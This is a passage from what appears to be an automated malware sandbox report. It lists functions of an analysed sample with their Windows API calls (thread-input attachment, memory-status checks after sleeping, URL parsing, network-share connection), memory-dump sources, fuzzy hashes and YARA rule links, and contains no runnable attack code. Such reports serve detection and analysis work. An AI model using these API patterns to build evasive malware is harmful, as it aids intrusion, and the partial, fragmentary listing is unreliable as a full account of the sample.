                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D788A6
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D788CA
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D788E5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                                                                                                                                  • Opcode ID: f1f02cc917bb0ea5454724db88b5d5af4101b9267594c3607e44ec0689fd69b3
                                                                                                                                                                                                                                                                  • Instruction ID: 2f2fb73a8a6b2a1abac832a78856da776a16e8d871a0386d472a343042405794
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1f02cc917bb0ea5454724db88b5d5af4101b9267594c3607e44ec0689fd69b3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 511143B9D0020DAFDB41CF98D8849EEBBB5FF08310F508156E919E2310E735AA94DF61
                                                                                                                                                                                                                                                                  Function 00D436F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D43712
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D43723
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4372A
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D43731
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                  • Opcode ID: cea01706aa5ae45a1339e5021b86d0b7e5adf78450d4cefca76f86137855a1f8
                                                                                                                                                                                                                                                                  • Instruction ID: 7ed0b9eb82c6ed99877fd9684eee0ff20ae06aa70729a16bc04bba0f34bef46c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea01706aa5ae45a1339e5021b86d0b7e5adf78450d4cefca76f86137855a1f8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE092B1101328BBDB2017A69C4EEEB7F7DDF42BE1F540015F50AD2180EAA0C980C2B0
                                                                                                                                                                                                                                                                  Function 00D792BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CE1F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1F96
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: BeginPath.GDI32(?), ref: 00CE1FAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1FD6
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00D792E3
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00D792F0
                                                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00D79300
                                                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00D7930E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                  • Opcode ID: d6ff6510ae0d1c140bdad18549bcda461aea1c11af1014f51e3afc55bbe71a23
                                                                                                                                                                                                                                                                  • Instruction ID: cfd6aba9ceedb2cd02f74e4d3904b311dadc24da6f4b5c1d0a6cf9966633f393
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6ff6510ae0d1c140bdad18549bcda461aea1c11af1014f51e3afc55bbe71a23
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF03A32045358BADB126F54AC0AFCA3A6AAF0A320F048201FA19A12E1D7759562DFB5
                                                                                                                                                                                                                                                                  Function 00CE21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00CE21BC
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00CE21C6
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00CE21D9
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00CE21E1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9a2e29e3bb62e4a0b3d3d76ecfb100dbb63be241b21ee435cfbd757f0c65e83b
                                                                                                                                                                                                                                                                  • Instruction ID: 19db244ad513b53702d1d30ab778ddf7b429a44992037da7e16cad8445f96a60
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2e29e3bb62e4a0b3d3d76ecfb100dbb63be241b21ee435cfbd757f0c65e83b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62E06531240740ABDB215B74BC097E83B22AF12336F148219F7BD941E0D77246809B20
                                                                                                                                                                                                                                                                  Function 00D3EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D3EC36
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D3EC40
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3EC60
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 00D3EC81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                  • Opcode ID: 10ba2d31ec2a122c88c8c54216fa1544a3e2b26324b5777b8a115adf2ae5ceee
                                                                                                                                                                                                                                                                  • Instruction ID: 15df726789168a05491c8a1dd7cc887afdc3eb43a483ab8880a4a5e5ed1961f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ba2d31ec2a122c88c8c54216fa1544a3e2b26324b5777b8a115adf2ae5ceee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE09A75800308DFCF41AFA1D948A6DBBB6EF58311F108459F94EE3390D7785981AF61
                                                                                                                                                                                                                                                                  Function 00D3EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D3EC4A
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D3EC54
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3EC60
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 00D3EC81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                  • Opcode ID: 62ba37b07409a62a972a4f94580cfa3c9d0418ad0453dbded9b2ac70f34a00e0
                                                                                                                                                                                                                                                                  • Instruction ID: 4e9ebe6a08ae6496f928ee81bd88f2eb2ea0f9897ee15977dd0ed744b10e0e50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ba37b07409a62a972a4f94580cfa3c9d0418ad0453dbded9b2ac70f34a00e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE09A75C00308DFCF51AFA1D948A5DBBB6AF58311B108459F94DE3350D77859419F21
                                                                                                                                                                                                                                                                  Function 00D557CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00D55919
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                  • String ID: *$LPT
                                                                                                                                                                                                                                                                  • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                  • Opcode ID: ce69f95c0ff9eba6dcf1dd7d198cee34c399ca722302ee742d2981ef97f24cb1
                                                                                                                                                                                                                                                                  • Instruction ID: ebe179dab39882aa86ceeb4c151c7867208cc45c6ba1b4bc6b7668f7ebb603a3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce69f95c0ff9eba6dcf1dd7d198cee34c399ca722302ee742d2981ef97f24cb1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB917A75A00604DFCB15CF54C4A4EAABBF1AF44314F198099EC4A9F366D735EE89CBA0
                                                                                                                                                                                                                                                                  Function 00D0E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00D0E67D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                  • Opcode ID: e0d42717fd9eecd5c512b5d642172ab9451ccb71032cbd93c81cc3bc16b9963a
                                                                                                                                                                                                                                                                  • Instruction ID: 9d82ff8ebebbef6ff9c09cb0a4a58e5ef5e5fba225197a452f7abf8ea5f97fab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0d42717fd9eecd5c512b5d642172ab9451ccb71032cbd93c81cc3bc16b9963a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17514962E18301B6C716F714F9013EA2BA4EB50B40F684D58F0D9823E9DE368CC5AB76
                                                                                                                                                                                                                                                                  Function 00CFA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                  • Opcode ID: 333246ff5b42b4a5e500a6d14c14319e2e390b4aa4b7e9a1724aac7afa3ba883
                                                                                                                                                                                                                                                                  • Instruction ID: 42a84fcf4275af0a9e33c4f796460d975fc4bf1f58346cc7d02863de0b7ab24a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 333246ff5b42b4a5e500a6d14c14319e2e390b4aa4b7e9a1724aac7afa3ba883
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4751447150434A9FCB25DF28C440ABABBA5EF15310F688055F9A59B2D0DB709E82EB72
                                                                                                                                                                                                                                                                  Function 00CFF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00CFF6DB
                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00CFF6F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: c77f4a1be624896624f530248746be6ada9d9238a90b8397792bfdf826023274
                                                                                                                                                                                                                                                                  • Instruction ID: 8262e3e88a789f4bfef012b225225cdf4aa7f5af636fd4a2cd02d7fc6329b373
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c77f4a1be624896624f530248746be6ada9d9238a90b8397792bfdf826023274
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 685149714087889BD320AF11DC86BAFBBECFF94300F81485DF1D9811A5DB308569DB66
                                                                                                                                                                                                                                                                  Function 00D661A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                  • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                  • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                  • Opcode ID: 367885278d5f806ae50e70883a63d35b6aade216baf957fad41f507b902cc792
                                                                                                                                                                                                                                                                  • Instruction ID: 05226da19e0dbaea97dacf05a2fe1dd13b69423c7816ad195b8e1ee992db1d1f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 367885278d5f806ae50e70883a63d35b6aade216baf957fad41f507b902cc792
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241BC71E002199FCB04EFA9C8A19BEBBB5FF59364F144029E506A7251EB71DD81CBA0
                                                                                                                                                                                                                                                                  Function 00D5DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D5DB75
                                                                                                                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D5DB7F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                                                  • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                  • Opcode ID: c7d54c9e9054b912ee903d77f9001d0d8a5c97bc479287577991ee777bad1aca
                                                                                                                                                                                                                                                                  • Instruction ID: f449afffdf4d4c47aa5eadb23f109495841320ba788d4d9f8f6b72765ecb02a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7d54c9e9054b912ee903d77f9001d0d8a5c97bc479287577991ee777bad1aca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66315E71801149ABCF15DFA1CD85AEE7FBAFF08304F100025FC19A6262EB719A5ADB60
                                                                                                                                                                                                                                                                  Function 00D74008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00D740BD
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D740F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
